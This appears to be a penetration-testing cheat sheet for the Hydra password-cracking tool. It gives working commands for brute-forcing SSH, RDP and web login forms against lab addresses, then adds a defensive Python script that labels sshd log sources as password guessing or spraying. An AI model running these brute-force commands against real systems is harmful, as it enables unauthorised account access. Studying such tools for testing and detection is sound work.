✅ Hydra

Hydra is a brute force online password cracking program

Introduction

  • Hydra is a brute force online password cracking program, a quick system login password “hacking” tool.

  • The options we pass into Hydra depend on which service (protocol) we’re attacking.

Commands

  • sudo hydra -l <User Name> -P <Password List> <Service Name (e.g. ssh or ftp)>://<Target IP Address> - Brute forces the specified service using the specified username and wordlist.

    • Example 1 : sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://10.10.161.54 - Brute forces SSH on the default port 22.

    • Example 2: sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201 - Brute forces SSH on port 2222 (-s specifies the port number).

    • Example 3: sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202 - Brute forces RDP on its default port number, using a username list and a single password.

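  • sudo hydra -l <User Name> -P <Password List> <Target IP Address> http-post-form "<Login Path>:<username field>=^USER^&<password field>=^PASS^:<Invalid Response>" - Brute forces an HTTP POST login form. The quoted argument has three colon-separated parts: the login path, the POST body (^USER^ and ^PASS^ are replaced on each attempt), and the text that appears in a failed-login response.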

    • Example 1: sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.161.54 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V - Brute forces an HTTP login form that passes the 2 arguments username and password, using the username molly and the rockyou password list (-V prints each attempt).

    • Example 2: sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" - Brute forces an HTTP login form that passes the 2 arguments fm_usr and fm_pwd. The username is fixed in the form body, so only ^PASS^ is substituted.
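
Detection side: the two option patterns above (-l with -P, and -L with -p) leave different traces in an sshd auth log. The script below is an added example, not part of the original cheat sheet; the log lines are constructed, and the threshold and label names are assumptions.

```python
import re
from collections import defaultdict

# OpenSSH logs failed password attempts in this form
# ("invalid user" is present when the account does not exist).
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def classify_sources(lines, threshold=5):
    """Return {source_ip: label} for sources with >= threshold failed logins.

    threshold is an assumed tuning value, not a recommendation from the page.
    """
    attempts = defaultdict(list)            # source IP -> usernames tried, in order
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            attempts[src].append(user)

    findings = {}
    for src, users in attempts.items():
        if len(users) < threshold:
            continue                        # too few failures to call it guessing
        distinct = len(set(users))
        if distinct == 1:
            findings[src] = "password-guessing"   # one user, many passwords (-l/-P)
        elif distinct == len(users):
            findings[src] = "password-spraying"   # many users, one try each (-L/-p)
        else:
            findings[src] = "mixed"
    return findings

def sample_log():
    """Constructed sshd lines: documentation-range IPs, made-up hosts and PIDs."""
    tmpl = "Jan 10 10:00:{:02d} host sshd[{}]: Failed password for {}{} from {} port {} ssh2"
    lines = [tmpl.format(i, 100 + i, "", "molly", "203.0.113.5", 40000 + i)
             for i in range(8)]
    names = ["alice", "bob", "carol", "dave", "erin", "frank"]
    lines += [tmpl.format(20 + i, 200 + i, "invalid user ", n, "198.51.100.7", 50000 + i)
              for i, n in enumerate(names)]
    lines.append(tmpl.format(40, 300, "", "george", "192.0.2.44", 60000))  # one typo
    lines.append("Jan 10 10:00:41 host sshd[301]: Accepted password for george "
                 "from 192.0.2.44 port 60001 ssh2")
    return lines

if __name__ == "__main__":
    for src, label in classify_sources(sample_log()).items():
        print(src, label)
```

Passwords never appear in the sshd log, so spraying is inferred from many distinct usernames tried once each from a single source.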
